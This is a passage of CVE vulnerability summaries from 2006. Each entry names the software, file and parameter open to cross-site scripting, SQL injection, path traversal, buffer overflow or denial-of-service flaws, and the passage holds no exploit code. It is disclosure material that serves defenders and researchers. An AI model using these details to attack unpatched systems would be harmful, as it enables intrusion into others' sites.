NmConsole/ToolResults.asp. [CVE-2006-2348] Cross-site scripting (XSS) vulnerability in form_grupo.html in E-Business Designer (eBD) 3.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2347] E-Business Designer (eBD) 3.1.4 and earlier allows remote attackers to obtain the full path of the web server via "'" characters, and possibly other invalid values, in (1) the id parameter to form_grupo.html, or requests to the (2) archivos/ and (3) files/ directories. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2345] Cross-site scripting (XSS) vulnerability in inc/elementz.php in AliPAGER 1.5 allows remote attackers to inject arbitrary web script or HTML via the ubild parameter. NOTE: the provenance of this information is unknown [CVE-2006-2343] Cross-site scripting (XSS) vulnerability in Search.do in ManageEngine OpManager 6.0 allows remote attackers to inject arbitrary web script or HTML via the searchTerm parameter. NOTE: the provenance of this information is unknown [CVE-2006-2342] IBM WebSphere Application Server 6.0.2 before FixPack 3 allows remote attackers to bypass authentication for the Welcome Page via a request to the default context root. [CVE-2006-2340] Cross-site scripting (XSS) vulnerability in PassMasterFlex and PassMasterFlexPlus (PassMasterFlex+) 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) username, (2) password, or (3) User-Agent HTTP header in the Hack Log. [CVE-2006-2337] Directory traversal vulnerability in webcm in the D-Link DSL-G604T Wireless ADSL Router Modem allows remote attackers to read arbitrary files via an absolute path in the getpage parameter. [CVE-2006-2332] Mozilla Firefox 1.5.0.3 allows remote attackers to cause a denial of service via a web page with a large number of IMG elements in which the SRC attribute is a mailto URI. NOTE: another researcher found that the web page caused a temporary browser slowdown instead of a crash. [CVE-2006-2325] Cross-site scripting (XSS) vulnerability in index.php in OnlyScript.info Online Universal Payment System Script allows remote attackers to inject arbitrary web script or HTML via the read parameter. NOTE: the provenance of this information is unknown [CVE-2006-2321] Multiple cross-site scripting (XSS) vulnerabilities in Ideal Science Ideal BB 1.5.4a and earlier allow remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: due to lack of details from the researcher, it is not clear whether this overlaps CVE-2004-2207. [CVE-2006-2317] Unspecified vulnerability in Ideal Science Ideal BB 1.5.4a and earlier allows remote attackers to read arbitrary files under the web root via unspecified attack vectors related to the OpenTextFile method in Scripting.FileSystemObject. [CVE-2006-2315] DISPUTED PHP remote file inclusion vulnerability in session.inc.php in ISPConfig 2.2.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the go_info[server][classes_root] parameter. NOTE: the vendor has disputed this vulnerability, saying that session.inc.php is not under the web root in version 2.2, and register_globals is not enabled. [CVE-2006-2311] Cross-site scripting (XSS) vulnerability in BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to inject arbitrary web script or HTML via the filename in a request to a (1) .cfm or (2) .cfml file, which reflects the result in the default error page. [CVE-2006-2307] Cross-site scripting (XSS) vulnerability in Website Baker CMS before 2.6.4 allows remote attackers to inject arbitrary web script or HTML via a user display name. [CVE-2006-2306] Cross-site scripting (XSS) vulnerability in moreinfo.asp in EPublisherPro allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown [CVE-2006-2305] Multiple cross-site scripting (XSS) vulnerabilities in Jadu CMS allow remote attackers to inject arbitrary web script or HTML via the (1) forename, (2) surname, (3) reg_email, (4) email_conf, (5) company, (6) city, (7) postcode, or (8) telephone parameters to site/scripts/register.php. NOTE: the provenance of this information is unknown [CVE-2006-2303] Cross-Application Scripting (XAS) vulnerability in ICQ Client 5.04 build 2321 and earlier allows remote attackers to inject arbitrary web script from one application into another via a banner, which is processed in the My Computer zone using the Internet Explorer COM object. [CVE-2006-2294] Cross-site scripting (XSS) vulnerability in Dynamic Galerie 1.0 allows remote attackers to inject arbitrary web script or HTML via the pfad parameter in (1) index.php and (2) galerie.php. NOTE: this issue might be resultant from directory traversal. [CVE-2006-2291] Cross-site scripting (XSS) vulnerability in calendar_new.asp in IA-Calendar allows remote attackers to inject arbitrary web script or HTML via the TypeName1 parameter. NOTE: the provenance of this information is unknown [CVE-2006-2290] Multiple cross-site scripting (XSS) vulnerabilities in kommentar.php in 2005-Comments-Script allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) email, and (3) url parameter. [CVE-2006-2287] Multiple cross-site scripting (XSS) vulnerabilities in Vision Source 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the fields in a user's profile. [CVE-2006-2282] Cross-site scripting (XSS) vulnerability in X7 Chat 2.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the URL of an avatar, possibly related to the avatar parameter in register.php. [CVE-2006-2280] Directory traversal vulnerability in website.php in openEngine 1.8 Beta 2 and earlier allows remote attackers to list arbitrary directories and read arbitrary files via a .. (dot dot) in the template parameter. [CVE-2006-2276] bgpd in Quagga 0.98 and 0.99 before 20060504 allows local users to cause a denial of service (CPU consumption) via a certain sh ip bgp command entered in the telnet interface. [CVE-2006-2269] Cross-site scripting (XSS) vulnerability in myWebland MyBloggie 2.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a BBCode img tag. [CVE-2006-2268] SQL injection vulnerability in FlexCustomer 0.0.4 and earlier allows remote attackers to bypass authentication and execute arbitrary SQL commands via the admin and ordinary user interface, probably involving the (1) checkuser and (2) checkpass parameters to (a) admin/index.php, and (3) username and (4) password parameters to (b) index.php. NOTE: it was later reported that 0.0.6 is also affected. [CVE-2006-2265] Cross-site scripting vulnerability in admin/main.asp in Ocean12 Calendar Manager Pro 1.00 allows remote attackers to inject arbitrary web script or HTML via the date parameter. NOTE: the provenance of this information is unknown [CVE-2006-2262] Cross-site scripting (XSS) vulnerability in index.php in singapore 0.9.7 allows remote attackers to inject arbitrary web script or HTML via the image parameter. [CVE-2006-2260] Cross-site scripting (XSS) vulnerability in the project module (project.module) in Drupal 4.5 and 4.6 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-2258] Cross-site scripting (XSS) vulnerability in Logon.asp in MaxxSchedule 1.0 allows remote attackers to inject arbitrary web script or HTML via the Error parameter. [CVE-2006-2257] Cross-site scripting (XSS) vulnerability in index.php in easyEvent 1.2 allows remote attackers to inject arbitrary web script or HTML via the curr_year parameter. [CVE-2006-2252] Cross-site scripting vulnerability in submit.php in OpenFAQ 0.4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-2249] Multiple cross-site scripting (XSS) vulnerabilities in search.php in CuteNews 1.4.1 and earlier, and possibly 1.4.5, allow remote attackers to inject arbitrary web script or HTML via the (1) user, (2) story, or (3) title parameters. [CVE-2006-2248] Xeneo Web Server 2.2.22.0 allows remote attackers to obtain the source code of script files via crafted requests containing dot, space, and slash characters in the file extension. [CVE-2006-2247] WebCalendar 1.0.1 to 1.0.3 generates different error messages depending on whether or not a username is valid, which allows remote attackers to enumerate valid usernames. [CVE-2006-2246] Cross-site scripting (XSS) vulnerability in UBlog 1.6 Access Edition allows remote attackers to inject arbitrary web script or HTML via text fields when adding a blog entry. [CVE-2006-2244] Multiple SQL injection vulnerabilities in Web4Future News Portal allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) comentarii.php or (2) view.php. [CVE-2006-2243] Multiple cross-site scripting (XSS) vulnerabilities in Web4Future News Portal allow remote attackers to inject arbitrary web script or HTML via the ID parameter to (1) comentarii.php or (2) view.php. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2240] Unspecified vulnerability in the (1) web cache or (2) web proxy in Fujitsu NetShelter/FW allows remote attackers to cause a denial of service (device unresponsiveness) via certain DNS packets, as demonstrated by the OUSPG PROTOS DNS test suite. [CVE-2006-2234] Multiple cross-site scripting (XSS) vulnerabilities in TyroCMS beta 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) a javascript URI in an img BBCode tag, or a JavaScript event in a (2) url BBCode tag or (3) color BBCode tag. [CVE-2006-2232] Cross-site scripting (XSS) vulnerability in Scriptsez Cute Guestbook 20060211 allows remote attackers to inject arbitrary web script or HTML via the Comments field when signing the guestbook. [CVE-2006-2231] Multiple cross-site scripting (XSS) vulnerabilities in addguest.cgi in Big Webmaster Guestbook Script 1.02 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) mail, (2) site, (3) city, (4) state, (5) country, and possibly (6) name fields, which are viewed via viewguest.cgi. [CVE-2006-2229] OpenVPN 2.0.7 and earlier, when configured to use the --management option with an IP that is not 127.0.0.1, uses a cleartext password for TCP sessions to the management interface, which might allow remote attackers to view sensitive information or cause a denial of service. [CVE-2006-2228] Cross-site scripting (XSS) vulnerability in w-Agora (aka Web-Agora) 4.2.0 allows remote attackers to inject arbitrary web script or HTML via a post with a BBCode tag that contains a JavaScript event name followed by whitespace before the '=' (equals) character, which bypasses a restrictive regular expression that attempts to remove onmouseover and other events. [CVE-2006-2227] Cross-site scripting (XSS) vulnerability in misc.php in PunBB 1.2.11 allows remote attackers to inject arbitrary web script or HTML via the req_message parameter, because the value of the redirect_url parameter is not sanitized. [CVE-2006-2216] Open Bulletin Board (OpenBB) 1.0.8 allows remote attackers to obtain the full path of the web server via an invalid pforums parameter to (1) misc.php and (2) member.php. [CVE-2006-2210] Cross-site scripting (XSS) vulnerability in index.php in 321soft PhP-Gallery 0.9 allows remote attackers to inject arbitrary web script or HTML via the path parameter. NOTE: this issue might be resultant from the directory traversal vulnerability. [CVE-2006-2208] Multiple cross-site scripting (XSS) vulnerabilities in mynews.inc.php in MyNews 1.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) hash and (2) page parameters. [CVE-2006-2195] Cross-site scripting (XSS) vulnerability in horde 3 (horde3) before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) templates/problem/problem.inc and (2) test.php. [CVE-2006-2190] Cross-site scripting (XSS) vulnerability in ow-shared.pl in OpenWebMail (OWM) 2.51 and earlier allows remote attackers to inject arbitrary web script or HTML via the sessionid parameter in (1) openwebmail-send.pl, (2) openwebmail-advsearch.pl, (3) openwebmail-folder.pl, (4) openwebmail-prefs.pl, (5) openwebmail-abook.pl, (6) openwebmail-read.pl, (7) openwebmail-cal.pl, and (8) openwebmail-webdisk.pl. NOTE: the openwebmail-main.pl vector is already covered by CVE-2005-2863. [CVE-2006-2188] Multiple cross-site scripting (XSS) vulnerabilities in CMScout 1.10 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the Body field of a private message (PM), (2) BBCode, or (3) a forum post. [CVE-2006-2187] Multiple cross-site scripting (XSS) vulnerabilities in zenphoto 1.0.1 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) a parameter in i.php, and the (2) album and (3) image parameters in index.php. [CVE-2006-2184] Cross-site scripting (XSS) vulnerability in search.php in PHPKB Knowledge Base allows remote attackers to inject arbitrary web script or HTML via the searchkeyword parameter. NOTE: the issue was originally disputed by the vendor, but on 20060519, the vendor notified CVE that "We have fixed all the mentioned issues and now the search section of PHPKB script is free from any XSS issues." [CVE-2006-2181] Multiple cross-site scripting (XSS) vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cid parameter to dlisting.php or (2) preloadSlideShow parameter to showpic.php. [CVE-2006-2178] Multiple cross-site scripting (XSS) vulnerabilities in CyberBuild allow remote attackers to inject arbitrary web script or HTML via the (1) SessionID parameter to login.asp, (2) ProductIndex parameter to browse0.htm, (3) rowcolor parameter to result.asp, or (4) heading parameter to result.asp. NOTE: vectors 1 and 2 might be resultant from SQL injection. [CVE-2006-2177] Cross-site scripting (XSS) vulnerability in viewcat.php in geoBlog 1.0 allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-2176] Multiple cross-site scripting (XSS) vulnerabilities in links.php in PHP Linkliste 1.0b allow remote attackers to inject arbitrary web script or HTML via the (1) new_input, (2) new_url, or (3) new_name parameter. [CVE-2006-2174] Multiple cross-site scripting (XSS) vulnerabilities in admin/server_day_stats.php in Virtual Hosting Control System (VHCS) allow remote attackers to inject arbitrary web script or HTML via the (1) day, (2) month, or (3) year parameter. [CVE-2006-2173] Buffer overflow in FileZilla FTP Server 2.2.22 allows remote authenticated attackers to cause a denial of service and possibly execute arbitrary code via a long (1) PORT or (2) PASS followed by the MLSD command, or (2) the remote server interface, as demonstrated by the Infigo FTPStress Fuzzer. [CVE-2006-2167] Cross-site scripting (XSS) vulnerability in SloughFlash SF-Users 1.0, possibly in register.php, allows remote attackers to inject arbitrary web script or HTML by setting the username field to contain JavaScript in the SRC attribute of an IMG element. [CVE-2006-2166] Unspecified vulnerability in the HTTP management interface in Cisco Unity Express (CUE) 2.2(2) and earlier, when running on any CUE Advanced Integration Module (AIM) or Network Module (NM), allows remote authenticated attackers to reset the password for any user with an expired password. [CVE-2006-2165] Multiple cross-site scripting (XSS) vulnerabilities in Avactis Shopping Cart 0.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) category_id parameter in (a) store_special_offers.php and (b) store.php and (2) prod_id parameter in (c) product_info.php. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2163] Cross-site scripting (XSS) vulnerability in index.php in Pinnacle Cart 3.33 and earlier allows remote attackers to inject arbitrary web script or HTML via the setbackurl parameter. [CVE-2006-2160] Cross-site scripting (XSS) vulnerability in Russcom Network Loginphp (Russcom.Loginphp) allows remote attackers to inject arbitrary web script or HTML via the username field when registering. [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter. [CVE-2006-2146] Multiple cross-site scripting (XSS) vulnerabilities in index.php in HB-NS 1.1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) poster_name, (2) poster_email, (3) poster_homepage, or (4) message parameter. [CVE-2006-2143] Multiple cross-site scripting (XSS) vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via Javascript events such as "onmouseover" in the (1) color, (2) size, or (3) url bbcode tags. [CVE-2006-2141] Cross-site scripting (XSS) vulnerability in popup_image in Collaborative Portal Server (CPS) 3.4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the pos argument. [CVE-2006-2140] Multiple cross-site scripting (XSS) vulnerabilities in OrbitHYIP 2.0 and earlier allow remote attackers to inject arbitrary web script via the (1) referral parameter to signup.php or (2) id parameter to members.php. [CVE-2006-2138] Cross-site scripting (XSS) vulnerability in neomail.pl in NeoMail 1.29 allows remote attackers to inject arbitrary web script or HTML via the sessionid parameter. [CVE-2006-2127] SQL injection vulnerability in weblog_posting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter. [CVE-2006-2124] Multiple cross-site scripting (XSS) vulnerabilities in SunShop 3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) prevaction, (2) previd, (3) prevstart, (4) itemid, (5) id, and (6) action parameters in index.php. [CVE-2006-2123] Multiple SQL injection vulnerabilities in the report interface in Network Administration Visualized (NAV) before 3.0.1 allow remote attackers to execute arbitrary SQL commands via unknown vectors. [CVE-2006-2117] Cross-site scripting (XSS) vulnerability in Thyme 1.3 allows remote attackers to inject arbitrary web script or HTML via the search page. [CVE-2006-2115] Format string vulnerability in SWS web Server 0.1.7 allows remote attackers to execute arbitrary code via unspecified vectors that are not properly handled in a syslog function call. [CVE-2006-2114] Buffer overflow in SWS web Server 0.1.7 allows remote attackers to execute arbitrary code via a long request. [CVE-2006-2112] Fuji Xerox Printing Systems (FXPS) print engine, as used in products including (1) Dell 3000cn through 5110cn and (2) Fuji Xerox DocuPrint firmware before 20060628 and Network Option Card firmware before 5.13, allows remote attackers to use the FTP printing interface as a proxy ("FTP bounce") by using arbitrary PORT arguments to connect to systems for which access would be otherwise restricted. [CVE-2006-2109] Cross-site scripting (XSS) vulnerability in the parse_query_str function in include/print.php in JSBoard 2.0.10 and 2.0.11, and possibly other versions before 2.0.12, allows remote attackers to inject arbitrary web script or HTML via parameters that are set as global variables within the program, as demonstrated using the table parameter to login.php. [CVE-2006-2106] Cross-site scripting (XSS) vulnerability in Edgewall Software Trac 0.9.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors related to a "wiki macro." [CVE-2006-2104] Multiple cross-site scripting (XSS) vulnerabilities in Kamgaing Email System (kmail) 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) d parameter to main.php, ordner parameter to (2) main.php, or (3) webdisk.php, (4) draft parameter to compose.php, or (5) m, or (6) y parameter to calendar.php. [CVE-2006-2089] Multiple cross-site scripting (XSS) vulnerabilities in misc.php in MySmartBB 1.1.x allow remote attackers to inject arbitrary web script or HTML via the (1) id and (2) username parameters. [CVE-2006-2088] Multiple cross-site scripting (XSS) vulnerabilities in Devsyn Open Bulletin Board (OpenBB) 1.0.6 allow remote attackers to inject arbitrary web script or HTML via (1) the FID parameter in board.php and (2) the TID parameter in read.php. NOTE: the SQL injection issues are already covered by CVE-2005-1612 (read.php) and CVE-2005-2566 (board.php). [CVE-2006-2084] Multiple cross-site scripting (XSS) vulnerabilities in FarsiNews 2.5.3 Pro and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters in (a) index.php, and the (3) mod parameter in (b) admin.php. [CVE-2006-2079] Cross-site scripting (XSS) vulnerability in portfolio.php in Verosky Media Instant Photo Gallery, possibly before 1.0.2, allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. [CVE-2006-2070] Cross-site scripting (XSS) vulnerability in member.php in DevBB 1.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the member parameter in a viewpro action. [CVE-2006-2066] Multiple cross-site scripting (XSS) vulnerabilities pm_popup.php in MKPortal 1.1 Rc1 and earlier, as used with vBulletin 3.5.4 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) u1, (2) m1, (3) m2, (4) m3, (5) m4 parameters. [CVE-2006-2063] Multiple cross-site scripting (XSS) vulnerabilities in Leadhound Full and LITE 2.1, and probably the Network Version "Full Version", allow remote attackers to inject arbitrary web script or HTML via the login parameter in (1) agent_affil.pl, (2) agent_help.pl, (3) agent_faq.pl, (4) agent_help_insert.pl, (5) sign_out.pl, (6) members.pl, (7) modify_agent_1.pl, (8) modify_agent_2.pl, (9) modify_agent.pl, (10) agent_links.pl, (11) agent_stats_pending_leads.pl, (12) agent_logoff.pl, (13) agent_rev_det.pl, (14) agent_subaffiliates.pl, (15) agent_stats_pending_leads.pl, (16) agent_transactions.pl, (17) agent_payment_history.pl, (18) agent_summary.pl, (19) agent_camp_all.pl, (20) agent_camp_new.pl, (21) agent_camp_notsub.pl, (22) agent_campaign.pl, (23) agent_camp_expired.pl, (24) agent_stats_det.pl, (25) agent_stats.pl, (26) agent_camp_det.pl, (27) agent_camp_sub.pl, (28) agent_affil_list.pl, and (29) agent_affil_code.pl [CVE-2006-2052] Cross-site scripting (XSS) vulnerability in Verosky Media Instant Photo Gallery allows remote attackers to inject arbitrary web script or HTML via the member parameter in a viewpro action in member.php. NOTE: the original report may be inaccurate, since the "viewpro" string does not appear in the source code for version 1.0.2 of the product. [CVE-2006-2051] Multiple cross-site scripting (XSS) vulnerabilities in myadmin/index.php in NextAge Shopping Cart allow remote attackers to inject arbitrary web script or HTML via the (1) username and (2) password parameters. [CVE-2006-2049] Cross-site scripting (XSS) vulnerability in dcboard.cgi in DCScripts DCForumLite 3.0 allows remote attackers to inject arbitrary web script or HTML via the az parameter. [CVE-2006-2048] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Edwin van Wijk phpWebFTP 2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) port, (2) server, and (3) user parameters. NOTE: it is possible that the affected version is actually 3.2. [CVE-2006-2043] na-img-4.0.34.bin for the IP3 Networks NetAccess NA75 allows local users to gain Unix shell access via "`" (backtick) characters in the appliance's command line interface (CLI). [CVE-2006-2041] PhpWebGallery before 1.6.0RC1 allows remote attackers to obtain arbitrary pictures via a request to picture.php without specifying the cat parameter. NOTE: the provenance of this information is unknown [CVE-2006-2037] Cross-site scripting (XSS) vulnerability in index.php in Thwboard 3.0 Beta 2.84 allows remote attackers to inject arbitrary web script or HTML via the navpath parameter. [CVE-2006-2035] Websense, when configured to permit access to the dynamic content category, allows local users to bypass intended blocking of the Uncategorized category by appending a "/?" sequence to a URL. [CVE-2006-2031] Cross-site scripting (XSS) vulnerability in index.php in phpMyAdmin 2.8.0.3, 2.8.0.2, 2.8.1-dev, and 2.9.0-dev allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2006-2030] The Allied Telesyn AT-9724TS switch allows remote attackers to cause a denial of service via a large amount of UDP data to the switch, which leads to unstable operation and possibly failure of the management interface or routing. [CVE-2006-2028] Cross-site scripting (XSS) vulnerability in imagelist.php in Jeremy Ashcraft Simplog 0.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the imagedir parameter. NOTE: this issue might be resultant from directory traversal. [CVE-2006-2016] Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dn parameter in (a) compare_form.php, (b) copy_form.php, (c) rename_form.php, (d) template_engine.php, and (e) delete_form.php [CVE-2006-2015] Cross-site scripting (XSS) vulnerability in SL_site 1.0 allows remote attackers to inject arbitrary web script or HTML via the recherche parameter in recherche.php. NOTE: other XSS vectors, as reported in the original disclosure, are resultant from other primary vulnerabilities that have separate CVE names. [CVE-2006-2011] Cross-site scripting (XSS) vulnerability in member.php in 4images 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the nickname, probably involving the user_name parameter in register.php. [CVE-2006-2003] Cross-site scripting (XSS) vulnerability in cgi-bin/guest in Community Architect Guestbook allows remote attackers to inject arbitrary web script or HTML by signing the guestbook, which is displayed by fsguestbook.html. NOTE: the provenance of this information is unknown [CVE-2006-2001] Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this is a different vulnerability than the directory traversal vector. [CVE-2006-2000] Cross-site scripting (XSS) vulnerability in /lms/a2z.jsp in logMethods 0.9 allows remote attackers to inject arbitrary web script or HTML via the kwd parameter. [CVE-2006-1989] Buffer overflow in the get_database function in the HTTP client in Freshclam in ClamAV 0.80 to 0.88.1 might allow remote web servers to execute arbitrary code via long HTTP headers. [CVE-2006-1988] The WebTextRenderer(WebInternal) _CG_drawRun:style:geometry: function in Apple Safari 2.0.3 allows remote attackers to cause a denial of service (application crash) via an HTML LI tag with a large VALUE attribute (list item number), which triggers a null dereference in QPainter::drawText, probably due to a failed memory allocation that uses the VALUE. [CVE-2006-1980] Cross-site scripting (XSS) vulnerability in W2B Online Banking allows remote attackers to inject arbitrary web script or HTML via the (1) query string, (2) SID parameter, or (3) ilang parameter. [CVE-2006-1979] Cross-site scripting (XSS) vulnerability in mwguest.php in Manic Web MWGuest 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the homepage parameter. [CVE-2006-1977] Cross-site scripting (XSS) vulnerability in FlexBB 0.5.7 BETA and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) message parameters. [CVE-2006-1976] Cross-site scripting (XSS) vulnerability in addRequest.php in Prayer Request Board (PRB) Beta 1 before 20060320 allows remote attackers to inject arbitrary web script or HTML via the Request field. [CVE-2006-1975] Cross-site scripting (XSS) vulnerability in guestbook_newentry.php in PHP-Gastebuch 1.61 allows remote attackers to inject arbitrary web script or HTML via the Kommentar field. [CVE-2006-1972] Cross-site scripting (XSS) vulnerability in EasyGallery.php in Wingnut EasyGallery allows remote attackers to inject arbitrary web script or HTML via the ordner parameter. [CVE-2006-1971] Cross-site scripting (XSS) vulnerability in login.php in KRANKIKOM ContentBoxX allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2006-1970] Cross-site scripting (XSS) vulnerability in classifieds/viewcat.cgi in KCScripts Classifieds, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. [CVE-2006-1969] Cross-site scripting (XSS) vulnerability in search/search.cgi in an unspecified KCScripts script, probably Search Engine or Site Search, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-1968] Cross-site scripting (XSS) vulnerability in news/NsVisitor.cgi in KCScripts News Publisher, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the sort_order parameter. [CVE-2006-1967] Cross-site scripting (XSS) vulnerability in calendar/Visitor.cgi in KCScripts Calendar, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the sort_order parameter. [CVE-2006-1965] Multiple cross-site scripting (XSS) vulnerabilities in aasi media Net Clubs Pro 4.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) onuser, (2) pass, (3) chatsys, (4) room, (5) username, and (6) to parameters in (a) sendim.cgi [CVE-2006-1961] Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13, Hosting Solution Engine (HSE) and User Registration Tool (URT) before 20060419, and all versions of Ethernet Subscriber Solution Engine (ESSE) and CiscoWorks2000 Service Management Solution (SMS) allow local users to gain Linux shell access via shell metacharacters in arguments to the "show" command in the application's command line interface (CLI), aka bug ID CSCsd21502 (WLSE), CSCsd22861 (URT), and CSCsd22859 (HSE). NOTE: other issues might be addressed by the Cisco advisory. [CVE-2006-1957] The com_rss option (rss.php) in (1) Mambo and (2) Joomla! allows remote attackers to cause a denial of service (disk consumption and possibly web-server outage) via multiple requests with different values of the feed parameter. [CVE-2006-1950] Multiple cross-site scripting (XSS) vulnerabilities in banners.cgi in PerlCoders BannerFarm 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) aff and (2) cat parameters. [CVE-2006-1946] Multiple cross-site scripting (XSS) vulnerabilities in Visale 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the keyval parameter in pbpgst.cgi, (2) the catsubno parameter in pblscg.cgi, and (3) the listno parameter in pblsmb.cgi. [CVE-2006-1945] Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732. [CVE-2006-1944] Multiple cross-site scripting (XSS) vulnerabilities in SibSoft CommuniMail 1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the list_id parameter in mailadmin.cgi and (2) the form_id parameter in templates.cgi. [CVE-2006-1943] Multiple cross-site scripting (XSS) vulnerabilities in Smarter Scripts IntelliLink Pro 5.06 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter in addlink_lwp.cgi and the (2) id, (3) forgotid, and (4) forgotpass parameters in edit.cgi. [CVE-2006-1942] Mozilla Firefox 1.5.0.2 and possibly other versions before 1.5.0.4, Netscape 8.1, 8.0.4, and 7.2, and K-Meleon 0.9.13 allows user-assisted remote attackers to open local files via a web page with an IMG element containing a SRC attribute with a non-image file:// URL, then tricking the user into selecting View Image for the broken image, as demonstrated using a .wma file to launch Windows Media Player, or by referencing an "alternate web page." [CVE-2006-1923] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) RSS/RSS.php and (2) possibly other vectors. [CVE-2006-1918] Multiple cross-site scripting (XSS) vulnerabilities in Papoo 2.1.5 allow remote attackers to inject arbitrary web script or HTML via the menuid parameter to (1) index.php or (2) forum.php, or the (3) reporeid_print parameter to print.php. [CVE-2006-1916] Multiple cross-site scripting (XSS) vulnerabilities in profile.php in DbbS 2.0-alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ulocation or (2) uhobbies parameters. [CVE-2006-1913] Cross-site scripting (XSS) vulnerability in jax_guestbook.php in Jax Guestbook 3.1, 3.31, and 3.50 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1911] Cross-site scripting (XSS) vulnerability in MyBB (MyBulletinBoard) 1.1 allows remote attackers to inject arbitrary web script or HTML via the attachment content disposition in an HTML attachment. [CVE-2006-1908] Cross-site scripting vulnerability in addevent.php in myEvent 1.x allows remote attackers to inject arbitrary web script or HTML via the event_desc parameter. NOTE: the provenance of this information is unknown [CVE-2006-1906] Cross-site scripting (XSS) vulnerability in index.php in jjgan852 phpLister 0.4.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1904] Cross-site scripting (XSS) vulnerability in index.php in AnimeGenesis Gallery allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-1903] Multiple cross-site scripting (XSS) vulnerabilities in UserLand Manila allow remote attackers to inject arbitrary web script or HTML (1) via the referer parameter in sendMail, and via attributes of (2) the A element and certain other HTML elements in web pages edited with the editInBrowser module. NOTE: the msgReader$1 mode attack vector is already covered by CVE-2006-1769. [CVE-2006-1900] Multiple buffer overflows in World Wide Web Consortium (W3C) Amaya 9.4, and possibly other versions including 8.x before 8.8.5, allow remote attackers to execute arbitrary code via a long value in (1) the COMPACT attribute of the COLGROUP element, (2) the ROWS attribute of the TEXTAREA element, and (3) the COLOR attribute of the LEGEND element [CVE-2006-1899] Multiple cross-site scripting (XSS) vulnerabilities in dev Neuron Blog 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) website parameters. [CVE-2006-1898] Multiple cross-site scripting (XSS) vulnerabilities in Ralph Capper Tiny PHP Forum (TPF) 3.6 allow remote attackers to inject arbitrary web script or HTML via (1) the uname parameter in a view action in profile.php and (2) a login name. NOTE: the "Access to hash password" issue is already covered by CVE-2006-0103. [CVE-2006-1897] Webplus (aka talentsoft) Web+Shop 5.3.6, when Redirect URL for "Script Not Found" Error is not configured, allows remote attackers to obtain sensitive information via a quote (') or possibly other invalid value in the storeid parameter in store.wml in 